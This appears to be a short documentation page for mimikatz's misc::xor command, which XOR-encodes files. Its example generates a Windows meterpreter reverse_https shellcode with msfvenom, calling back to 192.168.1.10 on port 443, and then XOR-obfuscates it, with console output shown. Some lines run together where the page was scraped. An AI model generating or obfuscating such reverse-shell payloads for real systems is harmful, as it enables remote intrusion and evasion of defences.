xor
misc::xor performs XOR decoding/encoding on a provided file with 0x42 default key. It has the following command line arguments:
/input: the file to XOR encode/output: the file to save the results/xor: they XOR key
The following example XOR encodes a metasploit generated shellcode:
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f raw -o mimi.binmimikatz # misc::xor /input:mimi.bin /output:mimi-xor.bin
Input : mimi.bin
Output: mimi-xor.bin
Xor : 0x42
Opening: OK
Writing: OKProvide an XOR encoding key:
mimikatz # misc::xor /input:mimi.bin /output:mimi-xor.bin /xor:0x40
Input : mimi.bin
Output: mimi-xor.bin
Xor : 0x40
Opening: OK
Writing: OKLast updated